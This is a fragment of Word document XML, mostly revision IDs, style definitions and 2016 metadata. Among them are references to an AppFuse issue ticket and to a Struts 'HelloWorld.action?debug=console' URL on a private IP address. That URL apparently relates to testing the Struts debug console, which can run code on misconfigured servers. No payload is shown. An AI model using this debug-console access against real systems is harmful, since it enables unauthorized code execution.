    <w:rsid w:val="008E709E"/>
    <w:rsid w:val="008F30DD"/>
    <w:rsid w:val="00902F3C"/>
    <w:rsid w:val="00927492"/>
    <w:rsid w:val="009523BD"/>
    <w:rsid w:val="009636F4"/>
    <w:rsid w:val="0096380B"/>
    <w:rsid w:val="00965221"/>
    <w:rsid w:val="009819D9"/>
    <w:rsid w:val="0098263C"/>
    <w:rsid w:val="00984F48"/>
    <w:rsid w:val="009976FE"/>
    <w:rsid w:val="009A5DAC"/>
    <w:rsid w:val="009A74D8"/>
    <w:rsid w:val="009C196C"/>
    <w:rsid w:val="009C247C"/>
    <w:rsid w:val="009C3D6E"/>
    <w:rsid w:val="009D47AB"/>
    <w:rsid w:val="009D648C"/>
    <w:rsid w:val="009E07A3"/>
    <w:rsid w:val="009F0F5D"/>
    <w:rsid w:val="009F2DF3"/>
    <w:rsid w:val="00A0100F"/>
    <w:rsid w:val="00A1342A"/>
    <w:rsid w:val="00A17830"/>
    <w:rsid w:val="00A2053C"/>
    <w:rsid w:val="00A218A1"/>
    <w:rsid w:val="00A2191C"/>
    <w:rsid w:val="00A22039"/>
    <w:rsid w:val="00A22B26"/>
    <w:rsid w:val="00A32357"/>
    <w:rsid w:val="00A51A31"/>
    <w:rsid w:val="00A52109"/>
    <w:rsid w:val="00A601C9"/>
    <w:rsid w:val="00A60E97"/>
    <w:rsid w:val="00A63716"/>
    <w:rsid w:val="00A66AA7"/>
    <w:rsid w:val="00A815AC"/>
    <w:rsid w:val="00A82D97"/>
    <w:rsid w:val="00A839C2"/>
    <w:rsid w:val="00AB5644"/>
    <w:rsid w:val="00AB7AFC"/>
    <w:rsid w:val="00AD3C5C"/>
    <w:rsid w:val="00B07B2B"/>
    <w:rsid w:val="00B104B6"/>
    <w:rsid w:val="00B2582E"/>
    <w:rsid w:val="00B36581"/>
    <w:rsid w:val="00B44B7F"/>
    <w:rsid w:val="00B51D7D"/>
    <w:rsid w:val="00B52706"/>
    <w:rsid w:val="00B53F87"/>
    <w:rsid w:val="00B70712"/>
    <w:rsid w:val="00B828FF"/>
    <w:rsid w:val="00B87F37"/>
    <w:rsid w:val="00B9129C"/>
    <w:rsid w:val="00BB6162"/>
    <w:rsid w:val="00BC2557"/>
    <w:rsid w:val="00BC4C40"/>
    <w:rsid w:val="00BD5F6F"/>
    <w:rsid w:val="00BD72E3"/>
    <w:rsid w:val="00BE1662"/>
    <w:rsid w:val="00BE6AA3"/>
    <w:rsid w:val="00BE7A40"/>
    <w:rsid w:val="00BF4B3A"/>
    <w:rsid w:val="00BF75CB"/>
    <w:rsid w:val="00C07C43"/>
    <w:rsid w:val="00C23E71"/>
    <w:rsid w:val="00C3015C"/>
    <w:rsid w:val="00C33EAA"/>
    <w:rsid w:val="00C579B4"/>
    <w:rsid w:val="00C6429D"/>
    <w:rsid w:val="00C66DE5"/>
    <w:rsid w:val="00C67AA6"/>
    <w:rsid w:val="00C86DEE"/>
    <w:rsid w:val="00CB14B8"/>
    <w:rsid w:val="00CB1951"/>
    <w:rsid w:val="00CC0917"/>
    <w:rsid w:val="00CC43C5"/>
    <w:rsid w:val="00CD1CB3"/>
    <w:rsid w:val="00CE390D"/>
    <w:rsid w:val="00D030F1"/>
    <w:rsid w:val="00D66129"/>
    <w:rsid w:val="00D91C49"/>
    <w:rsid w:val="00DB7C42"/>
    <w:rsid w:val="00DC6CD9"/>
    <w:rsid w:val="00DE6FD3"/>
    <w:rsid w:val="00DF3859"/>
    <w:rsid w:val="00E05235"/>
    <w:rsid w:val="00E07AD7"/>
    <w:rsid w:val="00E35061"/>
    <w:rsid w:val="00E413A6"/>
    <w:rsid w:val="00E41DB1"/>
    <w:rsid w:val="00E47828"/>
    <w:rsid w:val="00E52B1B"/>
    <w:rsid w:val="00E52FA4"/>
    <w:rsid w:val="00E532E4"/>
    <w:rsid w:val="00E60C8A"/>
    <w:rsid w:val="00E7569D"/>
    <w:rsid w:val="00E82DF5"/>
    <w:rsid w:val="00E87BF5"/>
    <w:rsid w:val="00E924F7"/>
    <w:rsid w:val="00EA12FD"/>
    <w:rsid w:val="00EB409A"/>
    <w:rsid w:val="00EC5F7C"/>
    <w:rsid w:val="00ED6D67"/>
    <w:rsid w:val="00EF2F93"/>
    <w:rsid w:val="00EF5F47"/>
    <w:rsid w:val="00EF609F"/>
    <w:rsid w:val="00F04E96"/>
    <w:rsid w:val="00F2316B"/>
    <w:rsid w:val="00F31DD5"/>
    <w:rsid w:val="00F43B56"/>
    <w:rsid w:val="00F47BCC"/>
    <w:rsid w:val="00F552D7"/>
    <w:rsid w:val="00F66A55"/>
    <w:rsid w:val="00F7226B"/>
    <w:rsid w:val="00F7488E"/>
    <w:rsid w:val="00F74B4D"/>
    <w:rsid w:val="00F857CF"/>
    <w:rsid w:val="00F86A30"/>
    <w:rsid w:val="00F86DC7"/>
    <w:rsid w:val="00F94971"/>
    <w:rsid w:val="00FA2582"/>
    <w:rsid w:val="00FA41C6"/>
    <w:rsid w:val="00FA64AB"/>
    <w:rsid w:val="00FB5450"/>
    <w:rsid w:val="00FE41D6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F06A5860-D15F-4AE5-A609-3D8B3AF3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3952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395203"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s3">
    <w:name w:val="s3"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00395203"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00314CD0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E756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3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issues.appfuse.org/browse/APF-1438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92.168.1.108:8081/example/HelloWorld.action?debug=console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8ED05-29AE-4EE6-AC42-19FC425A9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149</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-10T03:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-12T11:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>